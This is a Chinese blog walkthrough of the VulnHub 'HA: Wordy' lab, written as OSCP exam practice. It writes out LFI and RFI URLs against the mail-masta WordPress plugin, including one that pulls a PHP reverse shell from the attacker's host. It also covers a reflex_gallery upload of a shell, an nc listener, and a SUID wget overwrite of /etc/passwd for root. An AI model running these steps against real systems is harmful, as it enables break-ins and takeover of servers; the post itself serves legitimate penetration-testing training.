OSCP-vulnhub:ha-wordy靶机实战

已于 2022-07-12 10:53:37 修改
阅读量2.9k 收藏 4
点赞数 3
分类专栏: OSCP kali 文章标签: 大数据 安全 web安全 安全性测试
于 2022-07-12 10:42:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjstang/article/details/125738035
版权
OSCP 同时被 2 个专栏收录
9 篇文章 0 订阅
订阅专栏
kali
5 篇文章 0 订阅
订阅专栏

-----------------------------------------------------------------------------------------------------------

前置:本文题干阅读时间推荐10min,靶场练习推荐4h

-----------------------------------------------------------------------------------------------------------

目录

一、前言

二、靶机信息

三、虚拟机配置

四、信息收集

五、漏洞利用(突破边界)

六、提权

一、前言

主要利用方式:通过wordpress 插件的若干漏洞进行相对应的突破边界+suid提权

二、靶机信息

    靶场: vulnhub.com

    靶机名称: HA: Wordy

    难度: 简单

    发布时间: 2019 年 9月 13 日

    下载地址:https://www.vulnhub.com/entry/ha-wordy,363/

    备注:1、此靶机存在若干漏洞,皆有先对应的方式突破边界,拿到www权限,但过多的漏洞易导致混淆,思路混乱

               2、反弹shell过程中,存在apache及python web服务的php解析问题,需重点关注

三、虚拟机配置

采用的VMware、网络连接模式:NAT模式、DHCP服务:启用、IP地址:自动分配

四、信息收集

1、探测靶机ip地址

└─$ sudo arp-scan -I eth0 -l

2、探测靶机ip端口开放及开放端口的详细服务

└─$ sudo nmap -p- 192.168.169.150 

└─$ sudo nmap -p80 192.168.169.150

3、经过探测,只有80存在一个web服务,访问

http://192.168.169.150/

4、先进行目录探测,存在若干目录

[09:56:24] 200 -   11KB - /index.html                                      

[09:56:25] 200 -   15B  - /info.php                                        

[09:56:25] 301 -  323B  - /javascript  ->  http://192.168.169.150/javascript/                             

[09:56:47] 200 -   10KB - /wordpress/wp-login.php                          

[09:56:48] 200 -   48KB - /wordpress/

5、发现80服务存在wordpress ,直接上wpscan工具,扫描插件及用户

wpscan --url http://192.168.169.150/wordpress

五、漏洞利用(突破边界)

方法一:远程文件包含(RFI

6、这里mail masta查一下存在哪些漏洞,并下载本地文件包含的:50226.py 文件

7、本地查看50226.py的利用方式

8、通过本地文件包含(LFI)浏览器访问

http://192.168.169.152/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

9、验证了本地文件包含(LFI),再次尝试一下是否存在远程文件包含(RFI)

     cd到www/html文件夹下面,创建a.html文件,查看攻击机IP,并启动apache 服务,以备调用

10、通过浏览器去访问远程包含的url,验证存在测试的页面。

http://192.168.169.152/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://192.168.169.129/a.html

11、通过验证,存在远程文件包含,那就可以通过包含远程shell执行解析并进行反弹shell。

       拷贝kali自带的phpshell文件(php-reverse-shell.php),并进行更改名称为prs.php

12、更改反弹shell(监听机器)的IP及端口

13、关停apache服务,重新启动一个python web服务

      (此处需要思考的是攻击机和靶机皆为apache-php环境的时候,远程包含的文件到底在哪里解析执行)

14、攻击机设置监听,并在浏览器中访问URL

└─$ nc -nvlp 1234     

http://192.168.169.152/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://192.168.169.129/prs.php

15、反弹shell ,并查看id权限

方法二:任意文件上传(Arbitrary File Upload)

16、查看reflex_gallery 是否存在漏洞,下载相关漏洞说明:36374.txt,

17、查看36374.txt 关于reflex_gallery 的利用详情

18、构建exploit的html文件(b.html),并启动python服务,浏览器进行访问

19、复制前一个方法的shell文件(prs.php ->rev.php)并更改反弹shell的端口

20、点击browse 进行上传shell文件,点击Pwn!,并查看

192.168.169.152/wordpress/wp-content/uploads/2022/06/

21、攻击机设置监听,并在浏览器中访问URL

192.168.169.152/wordpress/wp-content/uploads/2022/06/rev.php

22、反弹shell ,并查看id权限

六、提权

23、查找suid权限文件,发现存在wget和cp,两种方法都可以直接覆盖root账号下的密码

24、wget -O 提权,利用wget -O命令覆盖/etc/passwd文件

在kali上创建文本文件,取名passwd,并将靶机/etc/passwd文件的内容复制进去。因为之后要覆盖靶机的/etc/passwd,所以名字要一模一样。

25使用openssl创建一个密码,覆盖到刚创建的passwd

└─$ openssl passwd -1 20220614        

$1$m3cg8nDD$xLODZ5eYt1mdOvCz.gld41

26、攻击机开启python服务,靶机使用wget下载kali中新建的passwd到靶机的/etc目录进行覆盖,并查看覆盖后的passwd

27、升级交互式终端,查看ID

28、cd到root根目录,查看flag文件

-----------------------------------------------------------------------------------------------------------

如果各位大佬想讨论以下技术的,欢迎私信联系我

  • OSCP相关技术(备考中
  • CISSP相关备考经验(已通过认证
  • CCSK(云安全) 及 ISO/IEC 27001 (2014) Foundation(已过认证

到此就结束啦,保持每周双更,我们下期再见

-----------------------------------------------------------------------------------------------------------

cjstang
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
java红酒网站源码-OSCP-Survival:OSCP-生存
06-05
java网站源码OSCP-生存 这是一个克隆 这也可以查看 OSCP-生存指南 注意:本文档将目标 ip 称为导出变量 $ip。 要在命令行上设置此值,请使用以下语法: 出口ip=192.168.1.100 目录 卡利Linux 将目标 IP 地址设置为$...
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
热门推荐
Aluxian_的博客
03-23 1万+
Vulnhub靶机DC3渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现:③:SQL注入:④:文件上传:⑤:提权: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载:
靶机DC-3—WP
m0_66638011的博客
05-17 1101
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试
网络安全常用靶场推荐
zxcvbnmasdflzl的博客
05-28 4235
网络安全常用靶场推荐
VulnHub靶场笔记 - DevGuru: 1(OSCP推荐靶场)
m0_62652276的博客
12-02 1130
OSCP推荐靶场:VulnHub DevGuru: 1 个人打靶笔记
vulnhub——ha:wordy靶机
Re1_zf的博客
10-23 555
利用连接靶机的shell使用wget从攻击机上下载构造好的passwd文件来覆盖靶机上的passwd文件。先在kali攻击机的web目录下创建一个passwd文件,内容为靶机的etc/passwd文件的内容。dirb直接扫描一下,可以了解到这是一个wordpress的站。有的时候还能直接发现一些关键的有用信息,不过这次没有发现。扫描出来的插件拿去msf搜索一下有没有可以利用的漏洞。没有什么可以利用的东西,就是初始的apache的首页。这里搜索到一个可以利用的这个插件的文件上传漏洞。
Vulhub靶机合集
Aiwin的博客
07-21 558
Vulhub靶机合集(持续记录)
CTF综合靶机渗透
xv66666的博客
08-11 995
虚拟机难度中等,使用ubuntu(32位),其他软件包有:PHPapacheMySQLBoot to root:从Web应用程序进入虚拟机,并获得root权限。靶机:使用VMWare打开虚机,网络连接方式设置为net,靶机自动获取IP。攻击机:同网段下有Windows攻击机,安装有Nmap、Burpsuit、Sqlmap、nc、Python2.7、DirBuster、AWVS、Nessus等渗透工具,kali攻击机,主要用Windows攻击机完成实验。ip发现启动Billu_b0x虚拟机,由于虚机网络设置为
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-4
Aluxian_的博客
06-17 959
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址:https://www.vulnhub.com/entry/driftingblues-4,661/ 下载好了把安装包解压 然后试用VMware即可。前言:这里又是DriftingBlues-2的问题 需要自己配网卡具体参考:h
DAY29(DAY30拓展):Vulnhub--靶机实战
qq_49433473的博客
08-12 2116
Vulnhub DC-1、DC-2靶机通关手册
oscp——HA: Wordy
王嘟嘟的博客
02-18 1206
0x00 前言 这个是做的第31台机子了。 0x01 信息收集 0x02 Web 访问一下 然后跑一下目录,拿到一个目录http://192.168.0.117/wordpress/ 是一个wp的站,扫一下插件和用户 这里mail-masta查一下洞 有一个EIF 还有一个sql需要账号密码 reflex gallery这个插件的洞,有一个文件上传,进行上传 site edit...
OSCP-PWK:https
04-27
OSCP 提供了更好的阅读体验,因为回购协议大多类似于草稿和备份。 注释和备忘单位于Wiki页面中。 回购中充斥着TryHackMe编写的内容和二进制文件。 卡利配置 ohmyzsh + powerlevel10K + tmux Kali 2020.3的提示:...
java红酒网站源码-oscp-notes:oscp-notes
06-05
java网站源码OSCP - PWK(使用 Kali 进行渗透测试)注意事项 完成整个 OSCP 课程的完整 OSCP 笔记 目录 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH...
java红酒网站源码-OSCP-Notes:OSCP-笔记
06-05
java网站源码OSCP-笔记 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH环境变量中搜索目录which sbd 查找名称中包含特定字符串的文件的搜索: find / -...
OSCP-Resources:有助于准备OSCP考试的资源集合
03-07
OSCP资源 有助于准备OSCP考试的资源的集合。 虚拟机/实验室环境 有大量的在线实验室环境可帮助您及时了解漏洞(新旧漏洞)。 HackTheBox -在线实验室环境- VulnHub -弱势虚拟机- TryHackMe -在线实验室环境- ...
VulnHub靶场笔记 - Brainpan(OSCP推荐靶场)
最新发布
m0_62652276的博客
01-02 965
首先,在main函数中,buf可以接收的大小为1000,但此处strcpy()函数将source(即buf)拷贝到Destination中,但Destination的大小为520,说明可以进行溢出。打开WinDbg,选择“运行可执行程序”,选择brainpain.exe,然后在命令框中输入g,开始运行。重启WinDbg中的程序,g运行;不过,上述代码中,需要将单引号和双引号互换,可以在记事本中借助中间字符完成这个操作。重启WinDbg中的程序,g运行,然后在Kali中执行exp.py。
Vulnhub-OSCP靶机实战
御七彩虹猫
05-10 2222
Vulnhub-OSCP靶机实战
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
Aluxian_的博客
09-05 2241
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。1.修改/etc/hosts文件 解析网站2.从新学习了一遍定时提权 (主要是回弹的命令)3.还有一些简单的扫码工具 和枚举工具 这靶机其实很简单 因为太久没做了 所以从新温习一下 主要是学习渗透的思路!
vulnhub靶机HA wordy渗透测试
Long_gone的博客
10-04 621
打开靶机后,先扫描一下靶机IP是多少: netdiscover 由经验推断出靶机IP为:192.168.34.224,然后使用使用nmap扫描一下靶机端口开放情况: nmap -sV -p 0-65535 192.168.34.224 发现有http端口开放,然后访问一下看看: 在页面并没有什么发现,然后我们先使用目录爆破一下看看: dirb http://192.168.34.224:...
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值